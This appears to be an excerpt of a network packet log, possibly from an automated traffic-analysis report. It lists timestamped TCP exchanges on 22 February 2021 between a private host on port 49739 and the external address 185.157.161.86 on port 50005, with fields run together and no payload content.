                                                                                                                                                                Feb 22, 2021 07:46:56.266987085 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.271974087 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.284524918 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.284662008 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.291798115 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.298834085 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.298954010 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.316870928 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.330786943 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.330912113 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.336929083 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.349777937 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.349869013 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.361757994 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.367779970 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.367855072 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.398830891 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.408798933 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.408885002 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.415762901 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.419799089 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.419934988 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.426731110 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.441797972 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.441859961 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.445759058 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.458771944 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.458887100 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.477701902 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.485773087 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.485917091 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.499545097 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.500749111 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.500832081 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.515902042 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.527575970 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.527676105 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.534105062 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.558765888 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.558871984 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.565864086 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.566749096 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.566808939 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.580862999 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.587752104 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.587831020 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.597059965 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.607769012 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.607893944 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.617202997 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.645812988 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.645867109 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.651949883 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.660837889 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.660903931 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.671876907 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.678793907 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.678869009 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.692030907 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.710799932 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.710875034 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.717999935 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.731854916 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.731977940 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.734734058 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.742017984 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.742172956 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.757827997 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.762809992 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.762964964 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.771689892 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.802957058 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.803100109 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.805866957 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.814810991 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.814924002 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.825953007 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.840894938 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.841037035 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.846947908 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.856942892 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.857043982 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.881918907 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.890885115 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.891026020 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.900883913 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.909907103 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.909979105 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.919912100 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.932055950 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.932178020 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.959912062 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.960906982 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.961009979 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.975939989 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.980768919 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:56.980882883 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:56.994803905 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.001943111 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.002074957 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.012072086 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.040855885 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.040941000 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.043736935 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.058871031 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.058940887 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.062853098 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.068821907 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.068901062 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.081831932 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.085779905 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.085905075 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.095823050 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.120865107 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.120999098 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.122731924 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.137734890 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.137888908 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.142709017 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.153799057 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.153920889 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.165762901 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.167746067 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.167859077 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.200292110 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.205737114 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.205806971 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.208761930 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.214719057 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.214792967 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.221801996 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.233779907 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.233887911 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.237833023 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.252691984 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.252832890 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.258760929 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.285608053 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.285756111 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.292850018 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.296741009 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.296919107 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.310772896 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.319715977 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.319859982 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.326848984 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.336765051 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.336863995 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.354769945 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.364589930 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.364660025 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.373805046 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.376739979 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.376857996 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.389780998 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.396980047 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.397104025 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.409710884 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.431850910 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.431988001 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.438838959 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.445725918 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.445796967 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.460756063 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.467816114 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.467914104 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.476789951 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.490741968 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.490807056 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.511847019 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.518819094 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.518920898 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.533910036 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.535897970 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.535989046 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.548790932 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.562760115 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.562899113 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.571788073 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.605165005 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.605233908 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.607728004 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.622747898 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.622848988 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.632740974 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.639787912 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.639893055 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.652956009 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.671924114 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.672264099 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.680666924 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.687709093 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.687783957 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.695678949 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.709830999 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.709940910 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.715938091 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.722954988 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.723073006 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.733704090 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.754787922 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.754872084 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.766721964 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.780782938 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.780934095 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.793965101 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.800723076 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.800856113 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.805763006 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.830825090 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.830924988 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.845916033 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.847742081 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.847820997 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.854949951 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.861780882 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.861871004 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.877161026 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.880757093 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.880857944 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.894143105 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.915689945 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.915806055 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.922782898 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.933748007 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.933855057 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.945808887 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.950782061 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.950880051 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.956881046 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.964010000 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:57.964191914 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:57.976036072 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.000834942 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.000974894 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.005844116 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.018909931 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.019049883 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.028830051 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.042054892 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.042140961 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.050931931 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.051846027 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.051960945 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.083216906 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.095469952 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.095668077 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.103809118 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.109785080 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.109869003 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.125777006 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.126791000 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.126883984 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.151958942 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.158963919 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.159121037 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.175466061 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.179934978 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.180013895 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.193058014 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.203759909 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.203833103 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.210953951 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.233127117 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.233196020 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.248795033 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.255930901 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.256016016 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.265825987 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.277084112 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.277189016 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.286412954 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.295839071 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.295979977 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.314827919 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.322798967 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.322928905 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.330725908 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.345803022 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.345944881 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.355803967 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.365899086 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.365926027 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.366050005 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.371673107 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.371732950 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.397059917 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.410789013 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.410919905 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.415734053 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.430728912 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.430880070 CET4973950005192.168.2.5185.157.161.86
                                                                                                                                                                Feb 22, 2021 07:46:58.436724901 CET5000549739185.157.161.86192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:58.446783066 CET5000549739185.157.161.86192.168.2.5
